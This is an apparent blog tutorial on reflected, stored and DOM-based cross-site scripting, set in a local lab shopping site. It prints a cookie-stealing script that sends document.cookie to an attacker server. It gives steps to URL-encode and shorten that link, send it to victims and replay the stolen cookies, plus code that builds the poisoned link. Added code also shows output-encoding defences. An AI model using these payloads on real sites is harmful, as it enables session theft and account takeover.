XSS Details

Hello hackers.
How are you? Today, God willing, we will go into a lot of detail about XSS (Cross-Site Scripting). The journey will be a bit long, so.. let's start.

Mohammed-Khalid (0xDARK)
17 min read · Mar 2, 2023

Why is it abbreviated XSS when the words start with C-S-S?!
Because the abbreviation CSS would clash with CSS (Cascading Style Sheets), the style language.

First, there are three types of this vulnerability, and they are

1- XSS Reflected

2- XSS Stored

3- XSS DOM

(You've just made the subject a big deal, my friend, you know 😥)

1- XSS Reflected

First, let's understand why the vulnerability occurs, why it is called by this name, and what mistake the programmer made while writing the site's code.

  • Why does the vulnerability occur?

It occurs primarily because the programmer trusted the user's input, not knowing that the user might be a hacker who manipulates that input.

The programmer's code may look like this, or follow the same idea:

He checks for a GET request carrying a field used to search for anything on the site, for example.

Then the user's input is taken from that field, and the programmer prints it on the page exactly as it was received.

To protect your page from this type of attack, all user input (such as forms and query parameters) must be validated, and it must be encoded for the context in which it is displayed (HTML-encoded before it is inserted into the page), so that any malicious markup is shown as text instead of being interpreted by the browser.

Input validation, output encoding (for example PHP's htmlspecialchars), and a Content Security Policy (CSP), which is a browser mechanism enabled by an HTTP response header rather than a library, are used together to help prevent these vulnerabilities.

# An almost complete example to illustrate the idea (without going into the details of formatting; it may happen as in the following example)

To be clearer, imagine a shopping site.
The site asks you to search for your favourite product in a search box.
The bad mistake I make here is trusting the user's input without encoding or filtering it.

  • Let's take a look at the consequences of this error

This is the content of the page. It looks like someone is searching for a tomato, and these are the results :)

Great, they have tomatoes.. But

One important thing while experimenting or looking for bugs is to look at the page source (this is very important).

The interesting thing is that what was typed into the input field was printed into the page source exactly as typed.
In other technical terms, it was put into the HTML and rendered to show you the result you see.

This means that it is possible to inject something that could be harmful.

But if you want to inject, do not start with the entire payload. Try the important, specific parts of the payload first, to understand what is happening here.

One of the most important and simplest things in payloads is these characters:

( < > ' " )

But why!!

Because these characters are the building blocks of HTML syntax: tags are delimited by < and >, and attribute values by ' and ". Focus a little on the source code in the previous pictures.. Ask yourself: what does it consist of??!

So when I do this, you must answer that question yourself to understand why I am trying exactly this way.

And soon you'll know why, after you see this result.

Why look at and verify the page source (where the input field's value is printed)?

I do this because, based on the form of the source code, I will shape the injection ..

Since the site does not clean, filter, or even encode the input,
let's inject our payload, hackers 😈

Here we go.. I will inject this, for example:

 <h1>tomatos</h1>

And the result is!!

  • Remember to always look at the source code

As you can see, we can inject into this web page.

But why is it called by that name, Reflected XSS?

Because the payload is only reflected back into your own browser, as if you were looking into a mirror.
But from here you see who holds your mirror and controls it.. Yes, it is you, the hacker 😈

But could a hacker exploit this vulnerability for something other than printing "Tomatoes" in a different way?

The attacker can:

  • Cookie theft: the attacker can use the vulnerability to steal the session cookie, and through it the user's account data, such as the username and other personal information
  • Account compromise: the attacker can use the vulnerability to take over user accounts by capturing login data or session tokens
  • Run malicious actions in the victim's browser: the injected JavaScript runs with the user's session, so it can make requests on the user's behalf, capture keystrokes on the page, or redirect the user to a malware download. By itself, XSS runs inside the browser sandbox; it does not install software on the machine unless it is chained with a browser exploit or social engineering
  • Page tampering: the attacker can use the vulnerability to modify the content of the page and show false information to the user
  • And more ..

For example, exploiting the vulnerability means crafting what you send to the victim; once the victim opens it, the malicious script is executed in his browser ..

There are a lot of exploits that you can use in the end; it depends on your situation, but I will explain here a small example of stealing user cookies:

document.location="URL?c=" + document.cookie ;

First, let's make a few simple changes:

First, add a cookie for the user:

I've given the cookie a content that humans can read (Lging_users) to illustrate the following examples. This is what the programmer does, except that a real programmer relies on an algorithm that generates cookie values like (sdfksdnfkjsndkjnfsdjknskdgn); this is just to clarify the idea.

And once the page is reloaded:

As you can see, the cookie's value appears in the Value column.

And now here is the complete PHP code. Once the web page is reloaded, it checks for a cookie with the name _user; if it does not exist, it creates it, and if it does exist, nothing happens:

We will modify the PHP to look like this:

Now let's explain the code:

  • First, we make a condition to check for a cookie named Mohammed. If it exists, we redirect the user to a page called test2.php; if not ..
  • We first check the GET request and store its value in a variable called search, and if it is set ..
  • We check the value of search: if it is Mohammed, I make a condition: if there is no cookie called Mohammed, I create it; if it exists, we go directly to the else branch,
    whose function is to display the content you are searching for ("it is the affected variable, do not forget" 🤫😉)

And this is the content of the test2.php page. To make it sensitive data, I display the cookies on that page using JavaScript:

<script>document.write(document.cookie)</script>

Now let's try what we did ..

As you can see, if you enter any value other than mohammed, the result is that the value is displayed on the page, and when you enter my name
it redirects me to another page called test2.php:

test2.php

In this way, we have made sure that sensitive and important content appears on test2.php.
We have made sure that this content (the cookie) is only shown to the user Mohammed, who is the one who registered ("it could be an email or something else and not just a username, because a username is not considered a real identifier")

Now 😈
Let's exploit this loophole like real hackers
and steal the user's cookies

Important:

These explanations are for security awareness, and this is a disclaimer regarding your use of this method on any site affected by this security vulnerability.

The following is the payload for stealing cookies in this way:

<script>document.location='http://192.168.43.241/attacker.php?cookie='+document.cookie</script>

And I will use another machine, which I will make my own server.
Then I will write the appropriate PHP code to receive the cookie value.

  • Go to /var/www/html,
    because this path is the default document root for files served by Apache
 cd /var/www/html 
  • And start the Apache server (root permissions are required)
service apache2 start 
  • Show the attacker's IP (the IP of the attacker's server)
ifconfig

Now let's start hacking

In my case I am typing this PHP code. I don't want to go too deep into explaining it; if you are familiar with JavaScript and PHP
you will see that it is very easy, and you can do a lot once the victim's browser reaches your server.

Now, in the event that the victim's browser runs this code, without him knowing anything about programming,
the result will be his cookies being stolen and then his being sent back to the same previous page, which in our case is the Markets Shop site.

Sometimes you can create your own link instead of entering your IP like this "192.168.43.241".
You can also encode this line of code to change its appearance:
<script>document.location='http://192.168.43.241/attacker.php?cookie='+document.cookie</script>

You can change this form to other forms in more than one way .. for example:

  • You can change the form of the input that you want to send to someone by encoding the previous value

In the previous example, it is a personal script that I use to URL-encode the payload.

  • You can send a link to the victim if you know that he uses a site, and this site is affected by this vulnerability

For example, when you type a search query, as you can see, it appears in the URL above as a GET parameter .. What if we did this?!

http://192.168.43.40/test.php?search=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F192.168.43.241%2Fattacker.php%3Fcookie%3D%27%2Bdocument.cookie%3C%2Fscript%3E

Note that every reserved character in the payload has to be percent-encoded, the + in particular (%2B): a literal + in a query string is decoded as a space by PHP's $_GET, which would break the script before it runs. Any stray space or wrong character inside the encoded link breaks it in the same way.
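The link above, built and checked in code. This is an added example and not the author's own encoding script; it uses the article's lab host and the search parameter, and models what the server-side query parser hands back so the + pitfall is visible:

```javascript
// Added example (not the author's own encoding script): building the poisoned
// search link for the reflected XSS case, and checking that what the server
// decodes is exactly the payload. TARGET and the parameter name 'search' are
// the article's lab values; the attacker host is the one used in the article.
const TARGET = 'http://192.168.43.40/test.php';
const PAYLOAD =
  "<script>document.location='http://192.168.43.241/attacker.php?cookie='+document.cookie</script>";

// Correct: encodeURIComponent escapes every reserved character, including the
// '+' (as %2B) and the '?' and '=' of the inner attacker URL.
function buildLink(target, param, payload) {
  return `${target}?${param}=${encodeURIComponent(payload)}`;
}

// Tempting but wrong: only the "obvious" characters are encoded and the '+'
// is left alone. Query-string parsers (PHP's $_GET included) turn a literal
// '+' into a space, so the victim's browser receives
//   document.location='http://...?cookie=' document.cookie
// which is a syntax error: nothing runs and nothing is exfiltrated.
function buildLinkNaive(target, param, payload) {
  const partial = payload
    .replace(/</g, '%3C')
    .replace(/>/g, '%3E')
    .replace(/ /g, '%20');
  return `${target}?${param}=${partial}`;
}

// Model of the server side: what a form-urlencoded query parser hands the
// page for one parameter (percent-decoding plus '+' -> space).
function decodeQueryParam(link, param) {
  return new URL(link).searchParams.get(param);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(buildLink(TARGET, 'search', PAYLOAD));
  console.log(decodeQueryParam(buildLink(TARGET, 'search', PAYLOAD), 'search'));
  console.log(decodeQueryParam(buildLinkNaive(TARGET, 'search', PAYLOAD), 'search'));
}
```

Run it with node and compare the two decoded lines: the first is the payload byte for byte, the second has a space where the + was. The same decoding rule is why a link copied with spaces or a non-ASCII character in it stops working.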

And then send this link to the victim. In any case, the result will be this!

Or you can go to a link-shortening site, for example:

And the result -> https://bit.ly/3FUVU7i

Send it to the victim.

Now that the victim has opened the link carrying the previous code, we have obtained this user's cookies.

And of course, the victim was redirected back to the previous page, "the page from which he came".

Modern browsers may now block these methods, or more precisely these payloads, because of defences we will discuss later. (The XSS filters that Chrome and Edge once shipped have been removed; on real sites, what usually defeats this particular payload is the HttpOnly flag on the session cookie, which keeps it out of document.cookie, and a Content Security Policy that blocks inline scripts.)

Therefore, if the attack did not work against an external server (the attacker's server), you can either try an older browser version or try it against your local server, but with a different path,
for example: <script>document.location='http://192.168.43.40/attacker.php?cookie='+document.cookie</script>

This will send the cookies to another page on your own device (as if they were being sent to the attacker's computer).

This idea of attack will be discussed, and things will be fine, God willing.

I guess he won't see or suspect anything strange ..
It may just occur to him that it was an internet problem and the page reloaded for some reason .. But only you know what happened.

After obtaining the cookies, you can either use them through a cookie editor extension in Chrome, Firefox, or any browser, or use Burp Suite.

In my case I have used the "Cookie Editor" extension.

Hence, you are logged in using the stolen cookies.

2- XSS Stored

Stored XSS is a security vulnerability that threatens websites and allows attackers to inject malicious data into pages that other users see when they visit the site.

For example, if a website's programmer stores user information in the site's database without sufficient verification (sometimes it is stored in the client's browser instead), an attacker can inject malicious scripts (such as JavaScript) into his own user data, thus gaining control over the pages that other users see; their browsers then carry out whatever the attacker wants.

A stored XSS vulnerability can leak sensitive user data, such as passwords and personal information, and expose the site's users to security risks and fraud.

As you can see from its name (stored),

the payload is stored in the database.
For example, while you are using Facebook (comments, posts, likes, etc.), all these things are saved in the database.
Note the difference between the comments themselves and the number of comments: when you delete a comment, the comment row is deleted from the database, while the value that displays the number of comments is a separate counter that your input never touches.
This is just a simple example to illustrate the idea.

Now let's get started ..

Open a terminal:

  • Start the MySQL service with the command
sudo service mysql start 
  • If it is your first time using MySQL and you want to set a password for the root account, you can use this statement in the MySQL shell
ALTER USER 'root'@'localhost' IDENTIFIED BY 'pass123'; 
  • The first time, I set the password for the service, and as you can see, I did this successfully
  • The second time, I entered the service password correctly
  • The third time, I intentionally entered the password incorrectly; the same error also appears if you log in with "sudo mysql -u root" as we did earlier, now that the account has a password

First let's see the databases I have, via the command

SHOW DATABASES ; 

It is conventional to write SQL keywords in uppercase letters.

If you use lowercase letters, the statement is still executed, since keywords are case-insensitive, but uppercase is the customary style.

Let's see the HTML and PHP code:

This is how the page appears ..

The PHP code might look like this:

But before that, I already had a database with the name users ..

Go to the page and enter the data ..

After sending the data, let's take a look at our database ("you won't see this in the real world, but this is just to get the idea across and understand what's going on and what's causing the vulnerability")

  • Select the database by name
USE users ; 
  • Show all tables in this database
SHOW TABLES ; 
  • Select and show all rows and columns in this table
SELECT * FROM comments ; 

And now, yes, what you're thinking right now is exactly what's going to happen 😈

As long as what is written is preserved in the database!!
What if I inject a nice payload right now?
Do you remember what happens when someone sees the Facebook comments on your photos?
Yes, exactly.. The payload will be executed for all users.
The payload will be executed for anyone who views your photo.
This is why you should go after fame, my friend 😅

You may feel it is similar to a vulnerability called SQL injection, but there is a difference in how the programmer handles these inputs: SQL injection abuses the way the input is put into the database query, while stored XSS abuses the way the stored value is put back into the page. Fixing one does not fix the other.

You can exploit this vulnerability in several ways, and as you can see it is very serious: Reflected XSS requires you to reach the user and use social engineering, but Stored XSS does not require any contact with the user, as the payload is executed as soon as he views the page, without him noticing anything strange.

Now, after adding the comment, as soon as the page is reloaded, we find this comment.

And this is after reading all the comments from the database, here in the PHP code.

And if you want to see the final form of the PHP and HTML code, it is like this:

Now, what if the payload is the same as the previous one? Do you remember it?!

<script>document.location='http://192.169.43.241/attacker.php?cookie='+ document.cookie</script>

Let's take a look at the database (remember, you won't see this in the real world; this is to see what's going on behind the scenes)

Thus, while displaying the comment of the user Ahmed, this malicious code is executed on that page (it is executed for everyone who requests that page, "the comments page").
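The fix the article describes for the reflected case (encode user input before printing it) is the same one that closes the stored case, so here is one added example covering both. It is not the article's PHP; it is a Node.js model of the search echo and of the comments page, each next to its hardened version, with the article's cookie-stealing payload as constructed input:

```javascript
// Added example (not the article's own PHP): a Node.js model of the two
// vulnerable pages in this article, the search echo (reflected XSS) and the
// comments page (stored XSS), next to hardened versions that HTML-encode user
// input at the moment it is written into the page. Run with: node xss_encoding.js

// Encode the five characters that let text break out of an HTML text node or
// a quoted attribute. This is what PHP's htmlspecialchars($s, ENT_QUOTES)
// does; use your framework's equivalent rather than a hand-written one.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Reflected, vulnerable: the search term is concatenated into the HTML exactly
// as received (the PHP equivalent is: echo $_GET['search'];).
function vulnerableSearchPage(search) {
  return `<p>Results for: ${search}</p>`;
}

// Reflected, hardened: same page, value encoded for HTML context.
function safeSearchPage(search) {
  return `<p>Results for: ${escapeHtml(search)}</p>`;
}

// Stored, vulnerable: comment rows come back from the database unchanged, so a
// payload saved once is rendered for every visitor of the comments page.
function vulnerableCommentsPage(rows) {
  return rows.map(r => `<li><b>${r.user}</b>: ${r.comment}</li>`).join('\n');
}

// Stored, hardened: encode at output time, for every user-supplied field,
// however it was stored. A parameterised INSERT protects the database query
// (SQL injection); only output encoding protects the page (XSS).
function safeCommentsPage(rows) {
  return rows
    .map(r => `<li><b>${escapeHtml(r.user)}</b>: ${escapeHtml(r.comment)}</li>`)
    .join('\n');
}

// Constructed sample input: the article's cookie-stealing payload, as an
// attacker would type it into the search box or the comment form.
const PAYLOAD =
  "<script>document.location='http://192.168.43.241/attacker.php?cookie='+document.cookie</script>";

const SAMPLE_ROWS = [
  { user: 'Mohammed', comment: 'Great tomatoes!' },
  { user: 'Ahmed', comment: PAYLOAD },
];

// Quick check: does the rendered HTML still contain a <script> tag that the
// browser would execute?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(vulnerableSearchPage(PAYLOAD));       // browser runs the script
  console.log(safeSearchPage(PAYLOAD));             // browser shows it as text
  console.log(vulnerableCommentsPage(SAMPLE_ROWS)); // runs for every viewer
  console.log(safeCommentsPage(SAMPLE_ROWS));       // shown as text
}
```

The encoding happens where the value meets the HTML, not where it is stored: the comment can stay in the database exactly as Ahmed typed it, and the page is still safe as long as every read path goes through the encoder.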

3- XSS DOM

DOM-based XSS is a security vulnerability in web applications that allows an attacker to inject malicious data (usually via parts of the URL) that the page's own JavaScript then writes into the page, running malicious JavaScript code in the victim's browser. This flaw puts users at risk of having their data stolen or malicious actions performed in their session.

An example of what the programmer might do wrong in this case is not filtering a value that comes from the user (from the URL) before a part of the page that is built with JavaScript inserts it into the DOM.

But why is this type mostly tested through the console??

Testing DOM-based XSS through the browser's console is popular because it lets you work directly against the page's own JavaScript: you can inspect the sources (location, document.referrer, etc.) and the sinks (document.write, innerHTML, eval, etc.), try payloads, and watch what the page does with them, without writing any server-side code. Keep in mind that code you type into your own console runs only in your own browser; the actual attack on other users still has to arrive through a source the attacker controls, such as the URL (this is the difference between real DOM XSS and the "self-XSS" scams that trick users into pasting code into their console).

In addition, testing the DOM-based variant through the console is much easier than with other tooling, which makes it very popular among attackers. Moreover, attackers can use online tools and scanners to search for websites that suffer from this vulnerability, making it easier for them to find the sites they are targeting.

Let's take a look at the HTML code:

Let's see the result:

And show the source code!!:

It looks a bit strange!

Let's go with a full payload to see what happens

And the source code!!:

I want to show you another result first, before I explain something to you

I added this line:

document.write('<div>' + `Hello ${params} !` + '</div>');

And the result:

The question is why??

  • The value is taken from the URL, and not from the field itself as was the case here:
XSS Reflected

In the reflected example, the value arrived without any modification because PHP decodes the URL for you: the superglobal

$_GET['search']

already contains the decoded text.
  • Here the value is still encoded, because the JavaScript read it raw from the URL, and values in the URL must be encoded

Why are the values in the URL encoded??

Converting text in URLs to this format is called percent-encoding, and it is the method used to represent characters that are not allowed in URLs (or that have a special meaning there) as %XX byte codes that can be carried safely.

Percent-encoding is used in URLs for several reasons, including:

1- Keeping the URL structure intact: characters such as ?, &, =, /, #, and space separate the parts of a URL, so when they appear inside a value they must be encoded, otherwise the value is cut or changed (for example, a literal + in a query string becomes a space). Note that percent-encoding is not a security measure: it is fully reversible, anyone can decode it, and it protects nothing from tampering

2- Text formatting support: percent-encoding converts characters that are not allowed in URLs into ASCII codes, which keeps the URL correctly formed

3- Language support: percent-encoding is used to carry text in languages whose characters are not allowed in URLs, such as East Asian languages, Arabic, and Hebrew, by encoding their UTF-8 bytes

In general, percent-encoding ensures that data is carried through a URL without being misinterpreted, and supports text formatting and other languages.

  • The text is treated as part of the string inserted into the page, and since it is still percent-encoded it is not interpreted as HTML or JavaScript

In other words, it looks like this:

    // What I typed: <script>alert("XSS")</script>

document.write('<div>' + `Hello ${params} !` + '</div>');

// What actually reached the sink, still encoded:
document.write('<div>' + `Hello %3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E !` + '</div>');

// With alert("XSS") as the input:
document.write('<div>' + `Hello alert%28%22XSS%22%29 !` + '</div>');

// With ` alert("XSS") ` as the input, you might imagine the backticks closing the template string:
// (skip this, it is NOT what happens)
document.write('<div>' + `Hello ` alert("XSS") ` !` + '</div>');

// This is what actually happens; the backticks arrive encoded too:
document.write('<div>' + `Hello %60+alert%28%22XSS%22%29+%60 !` + '</div>');
That’s why the result is like this :

Now I will go to Inspect > Console

and write:

document.write("Hacked By Mohammed-Khalid(0xDARK)");

Here, my friend, we have come to the end of this part.
I hope you enjoyed it with me, enough to follow the second part with me.

See you at another vulnerability soon,
God willing

Contact:

Facebook

Twitter

GitHub

LinkedIn